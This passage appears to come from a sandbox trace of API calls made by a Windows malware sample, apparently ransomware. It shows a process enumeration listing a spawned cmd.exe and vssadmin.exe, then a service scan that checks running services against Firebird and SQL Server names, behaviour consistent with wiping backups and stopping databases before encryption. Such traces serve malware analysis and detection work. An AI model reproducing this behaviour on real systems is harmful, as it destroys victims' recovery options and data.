th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0046.733] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0046.733] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0047.165] lstrlenW (lpString="wages.exe") returned 9 [0047.165] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0047.182] lstrlenW (lpString="rand.exe") returned 8 [0047.186] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0047.193] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0047.195] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0047.203] lstrlenW (lpString="cottage.exe") returned 11 [0047.203] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0047.204] lstrlenW (lpString="pairs_spec.exe") returned 14 [0047.204] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0047.205] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0047.205] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0047.205] lstrlenW (lpString="observationshairy.exe") returned 21 [0047.206] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0047.206] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0047.206] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0047.207] lstrlenW (lpString="spectrum.exe") returned 12 [0047.207] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0047.208] lstrlenW (lpString="dies.exe") returned 8 [0047.208] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0047.208] lstrlenW (lpString="configured.exe") returned 14 [0047.208] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0047.209] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0047.209] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0047.210] lstrlenW (lpString="fast.exe") returned 8 [0047.210] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0047.211] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0047.211] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0047.211] lstrlenW (lpString="review.exe") returned 10 [0047.211] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0047.212] lstrlenW (lpString="historybinding.exe") returned 18 [0047.212] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0047.213] lstrlenW (lpString="pk task surge.exe") returned 17 [0047.213] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0047.213] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0047.214] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0047.214] lstrlenW (lpString="mobsync.exe") returned 11 [0047.214] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0047.215] lstrlenW (lpString="ivttvf.exe") returned 10 [0047.215] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0047.216] lstrlenW (lpString="cmd.exe") returned 7 [0047.216] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.216] lstrlenW (lpString="conhost.exe") returned 11 [0047.216] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0047.217] lstrlenW (lpString="vssadmin.exe") returned 12 [0047.217] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0047.218] lstrlenW (lpString="VSSVC.exe") returned 9 [0047.218] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.218] lstrlenW (lpString="svchost.exe") returned 11 [0047.218] Process32NextW (in: hSnapshot=0x228, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0047.219] CloseHandle (hObject=0x228) returned 1 [0047.219] Sleep (dwMilliseconds=0x1f4) [0048.220] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efff8 [0048.221] EnumServicesStatusExW (in: hSCManager=0x5efff8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0048.221] GetLastError () returned 0xea [0048.221] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x39606f0 [0048.221] EnumServicesStatusExW (in: hSCManager=0x5efff8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39606f0, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39606f0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0048.222] CloseServiceHandle (hSCObject=0x5efff8) returned 1 [0048.222] lstrlenW (lpString="Appinfo") returned 7 [0048.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0048.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0048.222] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0048.222] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0048.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0048.222] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0048.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.222] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0048.222] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0048.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0048.222] lstrlenW (lpString="AudioSrv") returned 8 [0048.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0048.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0048.222] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0048.222] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0048.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0048.222] lstrlenW (lpString="BFE") returned 3 [0048.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0048.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0048.222] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0048.222] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0048.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0048.222] lstrlenW (lpString="CryptSvc") returned 8 [0048.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0048.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0048.223] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0048.223] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0048.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0048.223] lstrlenW (lpString="CscService") returned 10 [0048.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0048.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0048.223] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0048.223] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0048.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0048.223] lstrlenW (lpString="DcomLaunch") returned 10 [0048.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.223] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0048.223] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0048.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0048.223] lstrlenW (lpString="Dhcp") returned 4 [0048.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0048.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0048.223] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0048.223] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0048.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0048.223] lstrlenW (lpString="Dnscache") returned 8 [0048.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0048.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0048.223] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0048.223] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0048.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0048.223] lstrlenW (lpString="DPS") returned 3 [0048.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0048.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0048.223] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0048.223] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0048.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0048.223] lstrlenW (lpString="eventlog") returned 8 [0048.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0048.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0048.224] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0048.224] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0048.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0048.224] lstrlenW (lpString="EventSystem") returned 11 [0048.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0048.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0048.224] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0048.224] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0048.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0048.224] lstrlenW (lpString="gpsvc") returned 5 [0048.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0048.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0048.224] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0048.224] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0048.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0048.224] lstrlenW (lpString="iphlpsvc") returned 8 [0048.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.224] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0048.224] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0048.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0048.224] lstrlenW (lpString="LanmanServer") returned 12 [0048.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0048.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0048.224] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0048.224] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0048.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0048.224] lstrlenW (lpString="LanmanWorkstation") returned 17 [0048.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.224] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0048.224] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0048.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0048.225] lstrlenW (lpString="lmhosts") returned 7 [0048.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0048.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0048.225] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0048.225] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0048.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0048.225] lstrlenW (lpString="MMCSS") returned 5 [0048.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0048.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0048.225] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0048.225] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0048.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0048.225] lstrlenW (lpString="MpsSvc") returned 6 [0048.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0048.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0048.225] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0048.225] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0048.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0048.225] lstrlenW (lpString="Netman") returned 6 [0048.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0048.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0048.225] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0048.225] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0048.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0048.225] lstrlenW (lpString="netprofm") returned 8 [0048.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0048.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0048.225] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0048.225] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0048.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0048.225] lstrlenW (lpString="NlaSvc") returned 6 [0048.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0048.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0048.226] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0048.226] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0048.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0048.226] lstrlenW (lpString="nsi") returned 3 [0048.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0048.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0048.226] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0048.226] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0048.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0048.226] lstrlenW (lpString="PcaSvc") returned 6 [0048.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0048.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0048.226] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0048.226] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0048.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0048.226] lstrlenW (lpString="PlugPlay") returned 8 [0048.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0048.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0048.226] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0048.226] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0048.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0048.226] lstrlenW (lpString="Power") returned 5 [0048.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0048.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0048.226] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0048.226] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0048.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0048.226] lstrlenW (lpString="ProfSvc") returned 7 [0048.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0048.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0048.226] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0048.226] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0048.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0048.226] lstrlenW (lpString="RpcEptMapper") returned 12 [0048.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.227] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.227] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0048.227] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0048.227] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0048.227] lstrlenW (lpString="RpcSs") returned 5 [0048.227] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0048.227] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0048.227] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0048.227] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0048.227] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0048.227] lstrlenW (lpString="SamSs") returned 5 [0048.227] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0048.227] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0048.227] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0048.227] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0048.227] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0048.227] lstrlenW (lpString="Schedule") returned 8 [0048.227] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0048.227] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0048.227] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0048.227] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0048.227] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0048.227] lstrlenW (lpString="SENS") returned 4 [0048.227] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0048.227] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0048.228] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0048.228] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0048.228] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0048.228] lstrlenW (lpString="ShellHWDetection") returned 16 [0048.228] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.228] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.228] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0048.228] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0048.228] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0048.228] lstrlenW (lpString="Spooler") returned 7 [0048.228] lstrcmpiW 